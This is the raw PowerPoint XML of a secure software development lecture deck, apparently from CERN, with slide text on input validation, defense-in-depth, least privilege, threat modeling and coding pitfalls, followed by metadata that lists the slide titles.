          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP response header fields like referer, cookies etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP query string values (from hidden fields or explicit links)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Don’t expect your clients to send you SQL queries, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>shell commands etc. to execute – it’s not your code anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Do a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse lookup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>to find a hostname, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>and then lookup for that hostname to see if they match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Put limits on the number of connections, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>set reasonable timeouts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Message</a:t>
            </a:r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Security – in each phase of software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>not added after implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defense-in-depth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> is your worst enemy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>so validate all user input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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28674" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\szlaban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125538"/>
            <a:ext cx="6899275" cy="5173662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7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21076162">
            <a:off x="5016500" y="5041900"/>
            <a:ext cx="3824288" cy="982663"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security measures that can be easily bypassed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94213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Things to avoid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7" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="87842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GB" dirty="0" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="7346950" y="2644776"/>
            <a:ext cx="2890837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000" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.flickr.com/photos/calavera/65098350</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52229" name="Picture 5" descr="E:\Local\2010.06 Sec Day\securing\img\httpwww.flickr.comphotoscalavera6509835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7416" y="1052736"/>
            <a:ext cx="7855024" cy="5170201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57348" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251519" y="5301208"/>
            <a:ext cx="8744843" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Any questions?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB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Sebastian.Lopienski@cern.ch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15564371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Why security is difficult to achieve?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3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A system is as secure as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>like in a chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> needs to protect against all possible attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(currently known, and those yet to be discovered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>chooses the time, place, method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 7" descr="chai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3" y="2420938"/>
            <a:ext cx="1806575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4|38.8|21.5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1226</TotalTime>
  <Words>3068</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>737</Paragraphs>
  <Slides>84</Slides>
  <Notes>67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84</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="85" baseType="lpstr">
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Is this OK?</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>We are living in dangerous times</vt:lpstr>
      <vt:lpstr>Everything can get hacked</vt:lpstr>
      <vt:lpstr>What is (computer) security?</vt:lpstr>
      <vt:lpstr>Safety vs. security</vt:lpstr>
      <vt:lpstr>Security needs / objectives</vt:lpstr>
      <vt:lpstr>Why security is difficult to achieve?</vt:lpstr>
      <vt:lpstr>Why security is difficult to achieve?</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Software vs. Civil Engineering </vt:lpstr>
      <vt:lpstr>Is security an issue for you?</vt:lpstr>
      <vt:lpstr>Threat Modeling and Risk Assessment </vt:lpstr>
      <vt:lpstr>Threat Modeling and Risk Assessment</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>How to get secure?</vt:lpstr>
      <vt:lpstr>Protection, detection, reaction</vt:lpstr>
      <vt:lpstr>Protection, detection, reaction</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>How much security?</vt:lpstr>
      <vt:lpstr>Is a particular security measure good?</vt:lpstr>
      <vt:lpstr>Security measures</vt:lpstr>
      <vt:lpstr>Security through obscurity … ?</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Human – the weakest link </vt:lpstr>
      <vt:lpstr>Social engineering threats</vt:lpstr>
      <vt:lpstr>Social engineering – reducing risks</vt:lpstr>
      <vt:lpstr>Social engineering – rouge URLs</vt:lpstr>
      <vt:lpstr>Social engineering – a positive aspect</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Being paranoid</vt:lpstr>
      <vt:lpstr>Messages</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Software is vulnerable</vt:lpstr>
      <vt:lpstr>When to start?</vt:lpstr>
      <vt:lpstr>Software development life-cycle</vt:lpstr>
      <vt:lpstr>Requirements</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Multiple layers of defense</vt:lpstr>
      <vt:lpstr>Complexity</vt:lpstr>
      <vt:lpstr>Complexity</vt:lpstr>
      <vt:lpstr>Design – (some) golden rules</vt:lpstr>
      <vt:lpstr>Deny by default</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Enemy number one: Input data</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Input validation</vt:lpstr>
      <vt:lpstr>Validation and sanitization</vt:lpstr>
      <vt:lpstr>Sanitizing output</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Enemy #1: Input data (cont.)</vt:lpstr>
      <vt:lpstr>Coding – common pitfalls</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – common pitfalls (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice</vt:lpstr>
      <vt:lpstr>Coding – advice</vt:lpstr>
      <vt:lpstr>Errors / exceptions</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.) </vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>Coding – advice (cont.)</vt:lpstr>
      <vt:lpstr>After implementation</vt:lpstr>
      <vt:lpstr>Source code static analysis tools</vt:lpstr>
      <vt:lpstr>Code tools: FindBugs / Java</vt:lpstr>
      <vt:lpstr>Code tools: pychecker / Python</vt:lpstr>
      <vt:lpstr>Code tools: Pixy / PHP</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Coding - summary</vt:lpstr>
      <vt:lpstr>Security testing</vt:lpstr>
      <vt:lpstr>Further reading</vt:lpstr>
      <vt:lpstr>Networking –  no trust</vt:lpstr>
      <vt:lpstr>Message</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Thank you!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Sebastian Lopienski</dc:creator>
  <cp:lastModifiedBy>Sebastian Lopienski</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-01-24T17:08:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-16T21:26:53Z</dcterms:modified>
</cp:coreProperties>
</file>